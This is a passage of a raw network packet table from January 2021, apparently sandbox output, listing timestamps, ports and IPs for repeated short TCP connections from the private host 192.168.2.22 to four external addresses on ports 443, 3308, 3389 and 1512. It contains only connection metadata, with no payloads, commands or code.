Jan 12, 2021 01:45:50.949306011 CET	49370	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:50.957266092 CET	49370	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:50.957556009 CET	49370	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:51.009488106 CET	443	49370	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:51.009778976 CET	49370	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:51.047324896 CET	443	49370	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:51.061738014 CET	443	49370	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:51.061794043 CET	443	49370	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:51.178368092 CET	443	49370	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:51.178409100 CET	443	49370	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:51.178687096 CET	49370	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:51.184211969 CET	49370	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:51.236218929 CET	443	49370	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:51.303107023 CET	49371	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:51.346467972 CET	3308	49371	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:51.346643925 CET	49371	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:51.348143101 CET	49371	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:51.391215086 CET	3308	49371	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:51.402478933 CET	3308	49371	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:51.402523994 CET	3308	49371	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:51.402693987 CET	49371	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:51.402745008 CET	49371	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:51.419682026 CET	49371	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:51.465466022 CET	3308	49371	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:51.465807915 CET	49371	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:51.481924057 CET	49371	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:51.482172966 CET	49371	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:51.525608063 CET	3308	49371	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:51.525832891 CET	49371	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:51.569262981 CET	3308	49371	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:51.681246042 CET	3308	49371	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:51.681298018 CET	3308	49371	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:51.682357073 CET	49371	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:51.687546015 CET	49371	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:51.730784893 CET	3308	49371	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:51.801460981 CET	49372	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:51.856163025 CET	3389	49372	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:51.856307983 CET	49372	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:51.857763052 CET	49372	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:51.911550999 CET	3389	49372	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:51.928769112 CET	3389	49372	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:51.928808928 CET	3389	49372	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:51.928910971 CET	49372	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:51.928947926 CET	49372	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:51.941787004 CET	49372	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:52.003272057 CET	3389	49372	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:52.003371000 CET	49372	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:52.011151075 CET	49372	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:52.011347055 CET	49372	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:52.065510988 CET	3389	49372	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:52.065918922 CET	49372	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:52.105578899 CET	3389	49372	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:52.120263100 CET	3389	49372	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:52.120307922 CET	3389	49372	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:52.209501982 CET	3389	49372	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:52.209552050 CET	3389	49372	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:52.209610939 CET	49372	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:52.209649086 CET	49372	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:52.214803934 CET	49372	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:52.268794060 CET	3389	49372	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:52.328708887 CET	49373	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:52.381762028 CET	1512	49373	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:52.381944895 CET	49373	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:52.382713079 CET	49373	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:52.435661077 CET	1512	49373	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:52.442564011 CET	1512	49373	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:52.442598104 CET	1512	49373	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:52.442728043 CET	49373	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:52.442780972 CET	49373	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:52.457297087 CET	49373	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:52.511512041 CET	1512	49373	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:52.511706114 CET	49373	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:52.521648884 CET	49373	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:52.521817923 CET	49373	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:52.574863911 CET	1512	49373	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:52.575072050 CET	49373	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:52.614667892 CET	1512	49373	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:52.628174067 CET	1512	49373	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:52.628200054 CET	1512	49373	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:52.728082895 CET	1512	49373	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:52.728127003 CET	1512	49373	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:52.728247881 CET	49373	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:52.728308916 CET	49373	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:52.730525970 CET	49373	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:52.783622980 CET	1512	49373	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:52.847379923 CET	49374	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:52.899564028 CET	443	49374	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:52.899785995 CET	49374	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:52.901252031 CET	49374	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:52.955964088 CET	443	49374	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:52.970568895 CET	443	49374	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:52.970773935 CET	49374	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:52.985622883 CET	49374	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:53.040091038 CET	443	49374	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:53.040384054 CET	49374	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:53.052265882 CET	49374	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:53.052629948 CET	49374	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:53.104995012 CET	443	49374	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:53.105262995 CET	49374	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:53.157624960 CET	443	49374	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:53.276015997 CET	443	49374	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:53.276063919 CET	443	49374	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:53.276287079 CET	49374	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:53.281924963 CET	49374	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:53.334222078 CET	443	49374	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:53.393426895 CET	49375	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:53.436861992 CET	3308	49375	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:53.437099934 CET	49375	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:53.438848972 CET	49375	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:53.481966972 CET	3308	49375	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:53.492620945 CET	3308	49375	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:53.492657900 CET	3308	49375	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:53.492729902 CET	49375	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:53.492768049 CET	49375	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:53.509356976 CET	49375	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:53.554374933 CET	3308	49375	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:53.554601908 CET	49375	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:53.564620972 CET	49375	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:53.565028906 CET	49375	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:53.608046055 CET	3308	49375	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:53.608340025 CET	49375	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:53.647228956 CET	3308	49375	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:53.651652098 CET	3308	49375	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:53.651685953 CET	3308	49375	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:53.764751911 CET	3308	49375	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:53.764795065 CET	3308	49375	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:53.764862061 CET	49375	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:53.764906883 CET	49375	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:53.770422935 CET	49375	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:53.813535929 CET	3308	49375	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:53.892362118 CET	49376	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:53.946161032 CET	3389	49376	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:53.946374893 CET	49376	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:53.947886944 CET	49376	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:54.001163960 CET	3389	49376	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:54.021713018 CET	3389	49376	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:54.021749020 CET	3389	49376	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:54.021832943 CET	49376	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:54.021882057 CET	49376	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:54.035171032 CET	49376	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:54.094764948 CET	3389	49376	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:54.094934940 CET	49376	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:54.104756117 CET	49376	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:54.104960918 CET	49376	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:54.158512115 CET	3389	49376	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:54.158832073 CET	49376	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:54.197868109 CET	3389	49376	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:54.212292910 CET	3389	49376	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:54.212560892 CET	3389	49376	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:54.302483082 CET	3389	49376	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:54.302524090 CET	3389	49376	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:54.302828074 CET	49376	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:54.308434963 CET	49376	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:54.361835003 CET	3389	49376	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:54.422360897 CET	49377	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:54.475296974 CET	1512	49377	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:54.475405931 CET	49377	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:54.477087021 CET	49377	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:54.529819012 CET	1512	49377	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:54.537509918 CET	1512	49377	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:54.537530899 CET	1512	49377	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:54.537616968 CET	49377	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:54.537647963 CET	49377	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:54.546909094 CET	49377	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:54.600902081 CET	1512	49377	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:54.600999117 CET	49377	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:54.605438948 CET	49377	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:54.605604887 CET	49377	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:54.658308029 CET	1512	49377	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:54.658389091 CET	49377	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:54.694431067 CET	1512	49377	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:54.711154938 CET	1512	49377	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:54.711175919 CET	1512	49377	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:54.809834957 CET	1512	49377	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:54.809875965 CET	1512	49377	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:54.810002089 CET	49377	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:54.815582037 CET	49377	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:54.868617058 CET	1512	49377	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:54.937258959 CET	49378	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:54.989814997 CET	443	49378	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:54.989943981 CET	49378	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:54.991389990 CET	49378	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:55.043829918 CET	443	49378	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:55.058487892 CET	443	49378	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:55.058613062 CET	49378	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:55.072751045 CET	49378	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:55.128051996 CET	443	49378	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:55.128261089 CET	49378	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:55.138097048 CET	49378	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:55.138232946 CET	49378	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:55.190423965 CET	443	49378	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:55.190661907 CET	49378	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:55.227185965 CET	443	49378	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:55.243078947 CET	443	49378	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:55.243105888 CET	443	49378	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:55.361470938 CET	443	49378	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:55.361537933 CET	443	49378	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:55.361777067 CET	49378	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:55.367409945 CET	49378	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:55.420383930 CET	443	49378	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:55.483675957 CET	49379	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:55.527152061 CET	3308	49379	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:55.527354002 CET	49379	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:55.528932095 CET	49379	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:55.572002888 CET	3308	49379	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:55.582648993 CET	3308	49379	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:55.582681894 CET	3308	49379	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:55.582818985 CET	49379	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:55.582864046 CET	49379	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:55.597929955 CET	49379	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:55.642822027 CET	3308	49379	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:55.643163919 CET	49379	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:55.652250051 CET	49379	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:55.652436018 CET	49379	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:55.695655107 CET	3308	49379	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:55.695852995 CET	49379	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:55.735795975 CET	3308	49379	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:55.739160061 CET	3308	49379	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:55.739200115 CET	3308	49379	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:55.851375103 CET	3308	49379	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:55.851418018 CET	3308	49379	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:55.851756096 CET	49379	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:55.857217073 CET	49379	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:55.900408983 CET	3308	49379	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:55.982804060 CET	49380	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:56.036704063 CET	3389	49380	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:56.036865950 CET	49380	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:56.038523912 CET	49380	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:56.092504025 CET	3389	49380	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:56.123069048 CET	3389	49380	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:56.123106003 CET	3389	49380	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:56.123218060 CET	49380	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:56.123264074 CET	49380	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:56.137130976 CET	49380	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:56.198479891 CET	3389	49380	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:56.198647022 CET	49380	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:56.209289074 CET	49380	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:56.209363937 CET	49380	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:56.263220072 CET	3389	49380	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:56.263560057 CET	49380	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:56.302975893 CET	3389	49380	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:56.317681074 CET	3389	49380	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:56.317728043 CET	3389	49380	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:56.407222986 CET	3389	49380	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:56.407269955 CET	3389	49380	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:56.407619953 CET	49380	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:56.413238049 CET	49380	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:56.467447042 CET	3389	49380	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:56.529417992 CET	49381	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:56.582458019 CET	1512	49381	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:56.582643986 CET	49381	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:56.584383965 CET	49381	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:56.637059927 CET	1512	49381	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:56.644154072 CET	1512	49381	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:56.644186974 CET	1512	49381	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:56.644256115 CET	49381	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:56.644293070 CET	49381	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:56.658644915 CET	49381	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:56.712596893 CET	1512	49381	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:56.712920904 CET	49381	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:56.722758055 CET	49381	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:56.722868919 CET	49381	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:56.775681019 CET	1512	49381	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:56.775793076 CET	49381	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:56.814528942 CET	1512	49381	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:56.828850985 CET	1512	49381	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:56.929677010 CET	1512	49381	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:56.929729939 CET	1512	49381	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:56.929775953 CET	49381	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:56.929805994 CET	49381	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:56.934411049 CET	49381	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:56.987224102 CET	1512	49381	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:57.043978930 CET	49382	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:57.096374989 CET	443	49382	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:57.096652985 CET	49382	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:57.098666906 CET	49382	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:57.150887966 CET	443	49382	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:57.165930033 CET	443	49382	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:57.166115046 CET	49382	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:57.179744005 CET	49382	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:57.234479904 CET	443	49382	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:57.234852076 CET	49382	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:57.244965076 CET	49382	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:57.245366096 CET	49382	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:57.297528028 CET	443	49382	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:57.297739029 CET	49382	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:57.350053072 CET	443	49382	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:57.468199015 CET	443	49382	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:57.468241930 CET	443	49382	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:57.468532085 CET	49382	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:57.474205971 CET	49382	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:57.526563883 CET	443	49382	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:57.605645895 CET	49383	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:57.649034977 CET	3308	49383	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:57.649269104 CET	49383	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:57.651308060 CET	49383	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:57.694540024 CET	3308	49383	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:57.705209970 CET	3308	49383	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:57.705255032 CET	3308	49383	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:57.705360889 CET	49383	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:57.705405951 CET	49383	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:57.720935106 CET	49383	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:57.765810966 CET	3308	49383	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:57.765944958 CET	49383	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:57.776279926 CET	49383	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:57.776715040 CET	49383	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:57.819958925 CET	3308	49383	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:57.820249081 CET	49383	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:57.859270096 CET	3308	49383	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:57.863539934 CET	3308	49383	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:57.863574982 CET	3308	49383	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:57.976964951 CET	3308	49383	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:57.977009058 CET	3308	49383	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:57.977250099 CET	49383	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:57.982836008 CET	49383	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:58.026072979 CET	3308	49383	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:58.105003119 CET	49384	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:58.159219980 CET	3389	49384	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:58.159425020 CET	49384	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:58.161011934 CET	49384	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:58.214833021 CET	3389	49384	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:58.231600046 CET	3389	49384	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:58.231637001 CET	3389	49384	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:58.231784105 CET	49384	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:58.231836081 CET	49384	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:58.243944883 CET	49384	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:58.305561066 CET	3389	49384	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:58.306551933 CET	49384	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:58.315640926 CET	49384	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:58.315784931 CET	49384	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:58.370192051 CET	3389	49384	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:58.370470047 CET	49384	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:58.409143925 CET	3389	49384	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:58.425580025 CET	3389	49384	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:58.425632000 CET	3389	49384	5.100.228.233	192.168.2.22
